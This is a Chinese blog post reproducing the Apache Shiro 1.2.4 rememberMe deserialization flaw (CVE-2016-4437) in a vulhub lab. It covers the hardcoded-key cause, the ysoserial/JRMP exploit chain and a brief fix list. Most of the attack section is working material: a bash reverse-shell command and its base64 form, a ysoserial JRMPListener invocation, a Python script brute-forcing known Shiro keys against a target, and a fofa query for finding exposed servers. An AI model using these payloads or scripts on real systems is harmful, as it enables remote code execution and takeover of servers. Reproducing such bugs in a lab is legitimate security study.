Apache Shiro 1.2.4反序列化漏洞(CVE-2016-4437)

最新推荐文章于 2024-06-20 08:00:00 发布
最新推荐文章于 2024-06-20 08:00:00 发布
阅读量2.5k 收藏 8
点赞数 1
分类专栏: vulhub漏洞复现 文章标签: java spring boot web安全 安全 安全威胁分析
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_61506558/article/details/127713894
版权

目录

前言:

(一)基本介绍

0x01 影响版本

0x02 漏洞分析

根据加密的顺序,不难知道解密的顺序为:

登入

 验证

 (二)环境搭建

1、本地复现

0x01 源代码

0x02  pom.xml修改:

0x03 tomcat服务器

0x04  ysoserial-jar依赖

0x05  访问端口

 2、vulhub

 访问端口:

 (三)利用工具和方式

1、JRMP协议/服务器

2、ysoserial工具

利用方式1

 利用方式2 

3、利用流程

4、全部利用到的工具

 (四)利用实现

1、漏洞检测与发现

2、检测工具

3、流程

 0x01 攻击机kali监听端口

 0x02 Payload

0x03 启动JRMPListener:

 0x04 python生成Cookie

 0x05 抓包发送

(五)修复和防御

前言:

        关于shiro在2019年爆出来的漏洞,利用的条件相对来说比较苛刻,不仅要有一定的权限登入进去,进去之后密钥爆破也不一定可以成功,环境不好搭建,感兴趣的师傅可以看看Shiro RCE again(Padding Oracle Attack)-安全客 - 安全资讯平台[SHIRO-721] RememberMe Padding Oracle Vulnerability - ASF JIRA本篇文章介绍的是有关shiro反序列化的漏洞,

(一)基本介绍

SpringBoot整合框架——集成SpringSecurity、shiro_jinyouxin的博客-CSDN博客

0x01 影响版本

Apache Shiro <= 1.2.4

0x02 漏洞分析

Shiro提供了RememberMe的功能,关闭了浏览器下次再打开时还是能记住你是谁,下次访问时无需再登录即可访问。

Shiro对rememberMe的cookie做了加密处理,shiro在CookieRememberMeManaer类中将cookie中rememberMe字段内容分别进行序列化、AES加密、Base64编码操作。

根据加密的顺序,不难知道解密的顺序为:

 

  • 获取rememberMe cookie
  • base64 decode
  • 解密AES
  • 反序列化

但是,AES加密的密钥Key被硬编码在代码里,意味着每个人通过源代码都能拿到AES加密的密钥。因此,攻击者构造一个恶意的对象,并且对其序列化,AES加密,base64编码后,作为cookie的rememberMe字段发送。Shiro将rememberMe进行解密并且反序列化,最终造成反序列化漏洞。

登入

 验证

 (二)环境搭建

1、本地复现

0x01 源代码

  • 从github下载: https://github.com/apache/shiro/releases/tag/shiro-root-1.2.4
  • IDEA打开   shiro-shiro-root-1.2.4\samples\web

0x02  pom.xml修改:

<dependency>
    <groupId>javax.servlet</groupId>
    <artifactId>jstl</artifactId>
    <!-- 将jstl设置为1.2 -->
        <version>1.2</version>
        <scope>runtime</scope>
</dependency>
..... <dependency>
        <groupId>org.apache.commons</groupId>
        <artifactId>commons-collections4</artifactId>
        <version>4.0</version>
</dependency>

0x03 tomcat服务器

0x04  ysoserial-jar依赖

0x05  访问端口

 2、vulhub

 访问端口:

 (三)利用工具和方式

1、JRMP协议/服务器

JRMP全称为Java Remote Method Protocol, 也就是Java远程方法协议。其中 RMI 使用了 JRMP,保证了数据可以正常的传输。

2、ysoserial工具

由前面的原理的介绍,我们知道它是经历过AES加密,那么我们就必须要知道AES加密的key;还有一个重点就是我们要将利用恶意的类进行序列化,找到现成可以利用的CC链,从而实现攻击,所以我们在之前的pom文件里面引入了相关依赖。

 

        此款攻击可以检测Java项目是否有反序列化漏洞,并且可以找到该漏洞的利用链,我们先进行编译打包,mvn package -D skipTests,我们常常把这样的利用工具称为POP Gadgets,面向属性编程。

利用方式1

payloads/JRMPListener <> exploit/JRMPClient

 利用方式2 

exploit/JRMPListener <> payloads/JRMPClient

原理

https://www.jianshu.com/p/94aad7ee45b3
https://www.sohu.com/a/447023879_120045376
http://t.zoukankan.com/nice0e3-p-14280278.html

3、利用流程

  1. 先构建一个恶意命令,它的作用是让漏洞服务器连接到我们启动的JRMP服务器
  2. 把这个命令序列化、AES加密、base64编码(payload2),写入到Cookie,发给漏洞服务器
  3. 漏洞服务器:base64解码、序AES解密、反列化,执行恶意命令,连接到JRMP服务器
  4. 继续发送恶意payload1,利用CC等通用库的漏洞执行命令

4、全部利用到的工具

 (四)利用实现

1、漏洞检测与发现

在set-cookie是否存在remeberMe=deleteMe,fofa 语法搜:
header= "rememberme=deleteMe" 、header= "shiroCookie"

2、检测工具

本人水平有限,直接使用别人的一件利用工具,环境是基于 JDK8

  1. shiro_tool.jar 纯字符版
  2. ShiroExploitV2.51
  3. shiro_attack-v2.0.jar

3、流程

 0x01 攻击机kali监听端口

 0x02 Payload

反弹连接命令:

bash -i >& /dev/tcp/ 192.168.1.132/7777 0>&1
shiro对cookie的处理过程是:

所以先进行Base64进行加密。

  • 工具:https://ares-x.com/tools/runtime-exec/

 得到:

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTMyLzc3NzcgMD4mMQ==}|{base64,-d}|{bash,-i}

0x03 启动JRMPListener:

使用kali攻击机(192.168.1.132),生成监听端口,利用链可以通过前面工具找到。

java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 8888
CommonsCollections5 "bash -c
{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE0Mi4xMzIvNzc3NyAwPiY
x}|{base64,-d}|{bash,-i}"

 0x04 python生成Cookie

  • Kali机器(192.168.1.132)

  •  附:kali 切换python版本命令
kali配置
update-alternatives --install /usr/bin/python
python /usr/bin/python2 100
update-alternatives --install /usr/bin/python
python /usr/bin/python3 150
切换版本
update-alternatives --config python
在这里给出大佬Only Tao写的脚本 
import base64
import uuid
import requests
from Crypto.Cipher import AES
 
def encrypt_AES_GCM(msg, secretKey):
    aesCipher = AES.new(secretKey, AES.MODE_GCM)
    ciphertext, authTag = aesCipher.encrypt_and_digest(msg)
    return (ciphertext, aesCipher.nonce, authTag)
 
def encode_rememberme(target):
    keys = ['kPH+bIxk5D2deZiIxcaaaA==', '4AvVhmFLUs0KTA3Kprsdag==','66v1O8keKNV3TTcGPK1wzg==', 'SDKOLKn2J1j/2BHjeZwAoQ==']     # 此处简单列举几个密钥
    BS = AES.block_size
    pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
    mode = AES.MODE_CBC
    iv = uuid.uuid4().bytes
 
    file_body = base64.b64decode('rO0ABXNyADJvcmcuYXBhY2hlLnNoaXJvLnN1YmplY3QuU2ltcGxlUHJpbmNpcGFsQ29sbGVjdGlvbqh/WCXGowhKAwABTAAPcmVhbG1QcmluY2lwYWxzdAAPTGphdmEvdXRpbC9NYXA7eHBwdwEAeA==')
    for key in keys:
        try:
            # CBC加密
            encryptor = AES.new(base64.b64decode(key), mode, iv)
            base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(pad(file_body)))
            res = requests.get(target, cookies={'rememberMe': base64_ciphertext.decode()},timeout=3,verify=False, allow_redirects=False)
            if res.headers.get("Set-Cookie") == None:
                print("正确KEY :" + key)
                return key
            else:
                if 'rememberMe=deleteMe;' not in res.headers.get("Set-Cookie"):
                    print("正确key:" + key)
                    return key
            # GCM加密
            encryptedMsg = encrypt_AES_GCM(file_body, base64.b64decode(key))
            base64_ciphertext = base64.b64encode(encryptedMsg[1] + encryptedMsg[0] + encryptedMsg[2])
            res = requests.get(target, cookies={'rememberMe': base64_ciphertext.decode()}, timeout=3, verify=False, allow_redirects=False)
 
            if res.headers.get("Set-Cookie") == None:
                print("正确KEY:" + key)
                return key
            else:
                if 'rememberMe=deleteMe;' not in res.headers.get("Set-Cookie"):
                    print("正确key:" + key)
                    return key
            print("正确key:" + key)
            return key
        except Exception as e:
            print(e)
  • 生成payload
pip3 install pycrypto #先安装加密模块
python3 shiro.py 192.168.1.132:8888

 0x05 抓包发送

勾选remember me,火狐浏览器抓登录的包,把刚刚用py处理的payload复制上去。

 这里实际上对目标服务器做了二次请求,第一次请求是我们刚刚用BP发送的,第二次请求是利用到的jso工具发送的,它会连接到启动LRMP服务的8888端口,再进行反弹连接。如果不熟悉此过程可以看看下面如何进行反弹连接的,Redis未授权描述的更详细https://blog.csdn.net/m0_61506558/article/details/126738073?spm=1001.2014.3001.5501

 Redis未授权访问漏洞_jinyouxin的博客-CSDN博客

(五)修复和防御

  • 升级Shiro
  • 安全产品     看流量
  • 防御工具库   https://github.com/ikkisoft/SerialKiller/

@Camelus
关注
  • 1
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
Apache Shiro 1.2.4反序列化漏洞CVE-2016-4437)复现
锋刃科技的博客
03-05 851
简介 Apache Shiro是一套用于执行认证、授权、加密和会话管理的Java安全框架。 影响版本 Apache Shiro < 1.2.5 环境搭建 这里使用docker来搭建 环境地址 https://github.com/vulhub/vulhub/tree/master/shiro/CVE-2016-4437 进入目录并启动Apache Shiro 1.2.4的Web服务 cd vulhub-master/shiro/CVE-201...
shiro 反序列化漏洞综合利用工具 shiro_attack_by J1anfen
11-05
在提到的 "shiro_attack_by J1anfen" 工具中,重点是针对 Apache Shiro 的一个特定安全问题:反序列化漏洞反序列化漏洞通常出现在程序中,当接收到从网络或持久存储中读取的数据,并将其转换回原来的对象实例时...
Apache shiro1.2.4反序列化漏洞介绍.docx
07-01
Apache shiro1.2.4反序列化漏洞介绍 Apache Shiro是一个Java安全框架,执行身份验证、授权、密码和会话管理。Apache Shiro框架提供了记住我(RememberMe)的功能,关闭了浏览器下次再打开时还是能记住你是谁,下次访问时无需再登录即可访问。
CVE-2016-4437 Shiro550 & Shiro721 RememberMe Padding Oracle 漏洞利用
03-29
CVE-2016-4437 Shiro550 & Shiro721 RememberMe Padding Oracle Shiro721 RememberMe Padding Oracle影响版本: - Apache Shiro 1.2.5,1.2.6,1.3.0,1.3.1,1.3.2,1.4.0-RC2,1.4.0,1.4.1 CVE-2016-4437 Shiro550影响版本: - Apache Shiro<=1.2.4 exp: ``` GUI
Shiro550 反序列化漏洞CVE-2016-4437
最新发布
qq_68163788的博客
06-20 968
Apache Shiro是一个强大而易用的Java安全框架,专注于提供认证、授权、加密和会话管理等安全功能。Shiro旨在简化安全性,通过直观的设计和简单的API使安全功能的集成变得轻松。开发人员可以选择多种认证方式,灵活地管理用户的角色和权限,以确保对资源的安全访问。此外,Shiro还提供了便捷的加密工具,用于保护敏感数据的存储和传输。综合来看,Apache Shiro是一款功能全面且易于使用的安全框架,为开发人员提供了完善的安全解决方案,帮助他们构建安全可靠的应用程序。
Shiro 1.2.4反序列化漏洞
jxy158212的博客
02-24 723
Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。使用Shiro的易于理解的API,可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序。
网络安全深入学习第五课——热门框架漏洞(RCE— Apache Shiro 1.2.4反序列化漏洞
p36273的博客
09-18 801
----- 当程序在进行反序列化时,会自动调用一些函数,以PHP为例有__wakeup()、__destruct()等函数,Java中有readObject()方法等等,但是如果传入函数的参数可以被用户控制的话,用户可以输入一些恶意代码到函数中,从而导致反序列化漏洞。------ Shiro提供了记住我(RememberMe)的功能,比如访问淘宝等网站时,关闭了浏览器下次再打开时还是能够记住上次访问过的用户,下次访问时无需再登录即可访问。根据字节流中保存的对象状态及描述信息,通过反序列化重建对象。
Apache Shiro RememberMe 1.2.4 反序列化过程命令执行漏洞【原理扫描】
qq_46416934的博客
09-01 1165
系统将密钥硬编码在代码里,且在官方文档中并没有强调修改该密钥,导致框架使用者大多数都使用了默认密钥。检测漏洞ShiroConfig.java 是否包含 fCq+/xW488hMTCD+cmJ3aQ==,如果是使用的默认密钥则需要修改,防止被执行命令攻击。升级版本到 >=v.4.3.1(其实就是升级Shiro版本到1.7),并且重新生成一个新的秘钥替换cipherKey,保证唯一且不要泄漏。升级Shiro版本到 >=1.7,在调用的地方重新生成一个新的秘钥替换。都存在漏洞建议升级到shiro1.7版本。..
shiro反序列化漏洞
qq_41696518的博客
06-27 1489
在请求包的Cookie中为 rememberMe字段赋任意值,收到返回包的 Set-Cookie 中存在 rememberMe=deleteMe 字段,说明目标有使用Shiro框架,可以进一步测试。,然后将其作为cookie的rememberMe字段发送,Shiro将rememberMe进行解密并且反序列化,最终造成反序列化漏洞。硬编码要求程序的源代码在输入数据或所需格式发生变化时进行更改,以便最终用户可以通过程序外的某种方式更改细节。在攻击机:192.168.43.131 中生成rememberMe。
Apache Shiro 1.2.4反序列化漏洞CVE-2016-4437Shiro-550)
不曾扬帆,何以至远方
07-16 556
Shiro 1.2.4 反序列化Shiro 550、CVE-2016-4437
Shiro反序列化漏洞检测工具
01-05
1. **升级Shiro版本**:确保Shiro框架的版本高于1.2.4,因为从1.2.5开始,Apache Shiro已经修复了这个反序列化漏洞。 2. **禁用不必要的序列化**:避免在不受信任的输入上进行反序列化,尤其是在处理网络数据时。 3....
Apache Shiro身份验证绕过漏洞(CVE-2020-13933)
07-17
直接使用java -jar srping....war命令运行即可 执行之后,访问http://主机的IP:8888/admin/*或者http://主机的IP:8888/login
Apache Shiro 1.2.4 反序列化漏洞(CVE-2016-4437 )
weixin_60329395的博客
10-18 3588
1. 内容主要介绍shiro反序列化漏洞的原理和工具的利用。2. 要加深对漏洞的理解还是需要多研究一下自己编写需要的程序。
Shiro1.2.4发序列化漏洞
xxx9686的博客
09-15 881
其处理cookie的流程是:得到rememberMe的cookie值–>Base64解码–>AES解密–>反序列化。[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-L8gPSlap-1617317390954)(img/20200502103208430.png)][外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-dKHhvAMo-1617317390959)(img/20200502134629288.png)]
shiroApache Shiro 1.2.4 反序列化漏洞(CVE-2016-4437 )
Fighting_hawk的博客
07-02 5360
介绍shiro反序列化漏洞的原理、流程和综合利用工具的使用。
Apache Shiro <= 1.2.4反序列化漏洞攻击 CVE-2016-4437 已亲自复现
qq_42430287的博客
01-27 1949
1.2.5 之前的 Apache Shiro 中,当未为“记住我”功能配置密钥时,远程攻击者可以通过未指定的请求参数执行任意代码或绕过预期的访问限制。 Apache Shiro <= 1.2.4受害者IP:127.0.0.1 攻击者IP:8.140.54.167:40201vulfocus下载链接 启动vulfocus 环境启动后,访问http://8.140.54.167:40201/即可看到一个登录页面,说明已成功启动。工具下载链接: 使用工具输入目标对密钥进行爆破, 并检测利用链。 执行系统命令w
shiro反序列化漏洞复现(CVE-2016-4437
m0_70349048的博客
05-19 388
cookie的key为RememberMe,cookie的值是经过相关信息进行序列化,然后使用AES加密(对称),最后再使用Base64编码处理。,这意味着攻击者只要通过源代码找到AES加密的密钥,就可以构造一个恶意对象,对其进行序列化,AES加密,Base64编码,然后将其作为cookie的Remember Me字段发送,Shiro将RememberMe进行解密并且反序列化,最终造成反序列化漏洞。将生成的payload复制到请求包cookie的位置, 发包。可以看到,已经能够远程执行任意命令了。
Apache Shiro 1.2.4反序列化漏洞
07-27
Apache Shiro 1.2.4版本之前存在一个反序列化漏洞。在这个版本之前,默认的ASE密钥是固定的,这意味着攻击者可以直接反序列化执行恶意代码。然而,在1.2.4版本之后,ASE密钥不再是默认的,需要获取到密钥才能进行渗透。\[1\] 在服务端接收cookie值时,攻击者可以利用这个漏洞进行攻击。攻击者可以按照以下步骤来解析处理cookie值:首先检索RememberMe cookie的值,然后进行Base64解码,接着使用AES解密(加密密钥硬编码),最后进行反序列化操作。由于在调用反序列化时未进行任何过滤处理,攻击者可以触发远程代码执行漏洞。\[2\] 攻击者可以利用这个漏洞执行反弹shell语句,从而获取对目标系统的控制权。例如,可以使用以下命令执行反弹shell语句:python .\shiro_rce.py http://192.168.111.8:8080 "bash -i >& /dev/tcp/192.168.111.128/9001 0>&1"。\[3\] #### 引用[.reference_title] - *1* *2* *3* [Apache Shiro 1.2.4 反序列化漏洞(CVE-2016-4437 )](https://blog.csdn.net/weixin_60329395/article/details/127399081)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

@Camelus

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值